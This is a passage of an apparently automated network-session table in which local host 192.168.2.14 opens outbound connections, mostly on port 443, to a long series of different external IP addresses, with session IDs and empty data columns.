                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13538192.168.2.1454420151.159.231.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13539192.168.2.144184477.136.123.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13540192.168.2.1448198208.127.192.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13541192.168.2.144395261.131.162.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13542192.168.2.1438124202.153.203.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13543192.168.2.1459618175.127.107.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13544192.168.2.143459090.226.28.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13545192.168.2.1446374116.53.105.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13546192.168.2.145498072.120.183.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13547192.168.2.1434628196.64.132.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13548192.168.2.1454462124.121.114.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13549192.168.2.144634031.56.45.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13550192.168.2.1439598222.6.217.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13551192.168.2.1445460154.88.232.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13552192.168.2.1449252205.81.108.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13553192.168.2.1449196142.205.237.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13554192.168.2.14341564.215.132.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13555192.168.2.145730496.157.94.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13556192.168.2.144931440.194.243.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13557192.168.2.1449320160.40.104.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13558192.168.2.1454312113.90.244.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13559192.168.2.143408250.102.91.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13560192.168.2.145305852.64.107.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13561192.168.2.1432948125.108.72.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13562192.168.2.1433696158.100.93.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13563192.168.2.1459404213.13.236.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13564192.168.2.1457572179.142.232.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13565192.168.2.146060638.178.11.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13566192.168.2.1440350136.104.19.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13567192.168.2.145231646.125.222.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13568192.168.2.1447726196.186.161.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13569192.168.2.1446548147.206.75.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13570192.168.2.143463679.89.9.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13571192.168.2.1446816212.14.7.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13572192.168.2.143393259.47.168.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13573192.168.2.1451958141.40.7.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13574192.168.2.14591421.185.181.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13575192.168.2.1458994164.217.143.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13576192.168.2.1435512108.123.64.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13577192.168.2.1436130205.149.205.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13578192.168.2.1433362180.54.191.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13579192.168.2.144773293.67.135.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13580192.168.2.143958093.125.25.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13581192.168.2.1433464144.239.198.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13582192.168.2.1444648129.4.144.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13583192.168.2.143277269.19.88.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13584192.168.2.1445290111.207.24.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13585192.168.2.143430280.67.192.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13586192.168.2.1442124163.95.39.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13587192.168.2.145422885.60.233.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13588192.168.2.1441408142.15.154.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13589192.168.2.1444522156.78.94.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13590192.168.2.144954445.243.232.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13591192.168.2.1448010204.21.172.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13592192.168.2.1457062194.210.47.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13593192.168.2.1446748123.195.203.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13594192.168.2.1441676118.245.80.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13595192.168.2.144121844.152.70.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13596192.168.2.145448471.5.216.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13597192.168.2.1434904176.4.187.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13598192.168.2.1447884171.114.141.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13599192.168.2.1436968159.249.238.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13600192.168.2.1446906167.178.146.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13601192.168.2.1459460107.160.53.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13602192.168.2.1435436158.94.96.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13603192.168.2.143535014.216.226.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13604192.168.2.145551074.37.43.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13605192.168.2.1437244113.92.82.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13606192.168.2.1453892181.21.6.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13607192.168.2.1449286204.172.238.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13608192.168.2.145868661.70.57.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13609192.168.2.145234041.81.44.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13610192.168.2.1449980125.24.156.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13611192.168.2.144664895.145.221.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13612192.168.2.1441154220.65.33.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13613192.168.2.1451824200.80.169.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13614192.168.2.14383525.173.104.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13615192.168.2.144793682.240.177.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13616192.168.2.143504648.143.242.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13617192.168.2.1433654143.66.145.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13618192.168.2.1441432219.150.125.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13619192.168.2.1448238187.89.113.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13620192.168.2.144489241.71.238.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13621192.168.2.1456794138.114.63.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13622192.168.2.1441062162.143.138.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13623192.168.2.1433416131.7.175.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13624192.168.2.1434500163.73.237.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13625192.168.2.144923667.158.112.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13626192.168.2.1442580107.236.18.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13627192.168.2.1445740116.3.10.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13628192.168.2.1442134188.32.167.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13629192.168.2.1450328125.185.153.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13630192.168.2.14539109.139.237.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13631192.168.2.144219842.7.14.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13632192.168.2.1451970136.37.221.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13633192.168.2.1451562183.41.177.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13634192.168.2.1438470213.53.237.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13635192.168.2.1458766167.243.93.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13636192.168.2.1440062184.63.147.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13637192.168.2.143989812.153.242.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13638192.168.2.1456934165.138.159.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13639192.168.2.1436692191.174.74.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13640192.168.2.145429039.29.55.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13641192.168.2.144709282.225.59.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13642192.168.2.145689812.132.100.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13643192.168.2.1454622168.44.113.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13644192.168.2.1448080220.229.233.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13645192.168.2.1441134153.34.33.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13646192.168.2.143445882.153.214.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13647192.168.2.1455594120.161.56.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13648192.168.2.14377282.248.248.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13649192.168.2.143492639.198.179.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13650192.168.2.1435290117.5.124.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13651192.168.2.145694813.78.250.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13652192.168.2.143822898.249.222.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13653192.168.2.145259684.211.133.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13654192.168.2.143637089.28.11.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13655192.168.2.145893491.65.60.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13656192.168.2.144099243.240.55.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13657192.168.2.144327888.86.182.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13658192.168.2.1458462124.78.102.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13659192.168.2.144007270.155.35.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13660192.168.2.1439940131.99.40.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13661192.168.2.145107251.9.229.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13662192.168.2.144309895.104.149.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13663192.168.2.1450432132.191.141.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13664192.168.2.144665018.90.191.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13665192.168.2.145068412.105.198.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13666192.168.2.1436690160.238.147.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13667192.168.2.1443060163.197.225.608080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13668192.168.2.1438140198.245.61.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13669192.168.2.143497031.11.134.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13670192.168.2.1455360104.204.103.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13671192.168.2.143475446.49.3.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13672192.168.2.1460464145.70.90.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13673192.168.2.1453800210.68.195.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13674192.168.2.1437260219.218.207.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13675192.168.2.1436052103.68.31.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13676192.168.2.1434732117.90.80.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13677192.168.2.1453990172.79.234.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13678192.168.2.1433784132.74.40.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13679192.168.2.1434750123.159.234.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13680192.168.2.146075689.93.117.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13681192.168.2.145514224.124.15.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13682192.168.2.144297620.31.55.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13683192.168.2.1432778220.44.158.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13684192.168.2.1438970120.84.15.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13685192.168.2.144241649.111.136.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13686192.168.2.1452286170.211.35.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13687192.168.2.1445724128.7.129.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13688192.168.2.145573081.153.46.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13689192.168.2.1435526164.5.142.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13690192.168.2.143451641.21.121.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13691192.168.2.1455732206.249.233.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13692192.168.2.144917667.254.50.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13693192.168.2.1437220206.42.106.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13694192.168.2.145321627.5.220.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13695192.168.2.1440826137.240.241.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13696192.168.2.1440468201.154.2.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13697192.168.2.1457160168.205.201.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13698192.168.2.1454502187.169.150.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13699192.168.2.1434294111.240.212.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13700192.168.2.143503494.255.84.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13701192.168.2.1442414118.207.36.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13702192.168.2.1459984212.245.129.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13703192.168.2.1447532103.144.208.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13704192.168.2.1449616202.22.85.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13705192.168.2.1439534134.76.90.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13706192.168.2.1459336150.160.119.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13707192.168.2.1455484136.83.253.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13708192.168.2.1433422148.68.103.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13709192.168.2.143606635.27.135.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13710192.168.2.1443638213.249.163.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13711192.168.2.1450072173.237.175.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13712192.168.2.1448620204.119.48.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13713192.168.2.1443966202.115.33.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13714192.168.2.1460376175.89.112.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13715192.168.2.1437426155.7.39.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13716192.168.2.143764890.50.5.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13717192.168.2.1449256190.85.215.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13718192.168.2.1453334124.86.41.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13719192.168.2.1445918222.34.249.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13720192.168.2.1444974221.99.80.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13721192.168.2.143419872.57.56.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13722192.168.2.1459046159.75.30.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13723192.168.2.1445030150.66.130.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13724192.168.2.1433490121.199.255.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13725192.168.2.145683225.113.97.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13726192.168.2.143319461.14.253.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13727192.168.2.1443964156.237.174.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13728192.168.2.1441064115.124.211.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13729192.168.2.145422462.88.118.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13730192.168.2.1434350107.183.188.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13731192.168.2.1459572179.187.87.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13732192.168.2.1453038142.20.133.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13733192.168.2.1437672172.255.230.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13734192.168.2.1443454204.254.10.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13735192.168.2.143859218.57.234.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13736192.168.2.1435438154.163.105.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13737192.168.2.1435704110.208.99.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13738192.168.2.143412466.116.33.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13739192.168.2.1444092105.154.59.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13740192.168.2.1452294114.188.102.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13741192.168.2.1437336218.121.89.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13742192.168.2.144852097.116.3.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13743192.168.2.145175697.242.14.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13744192.168.2.1435278157.34.182.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13745192.168.2.1437978166.230.106.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13746192.168.2.1455486107.18.204.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13747192.168.2.1439520119.104.228.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13748192.168.2.145020472.172.64.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13749192.168.2.1452208112.12.230.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13750192.168.2.1441960124.100.33.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13751192.168.2.1441064155.206.217.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13752192.168.2.143982271.27.44.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13753192.168.2.1455064173.141.90.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13754192.168.2.1443154207.242.170.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13755192.168.2.1451046174.152.119.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13756192.168.2.1456274210.240.71.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13757192.168.2.143946668.215.22.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13758192.168.2.1444960219.136.112.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
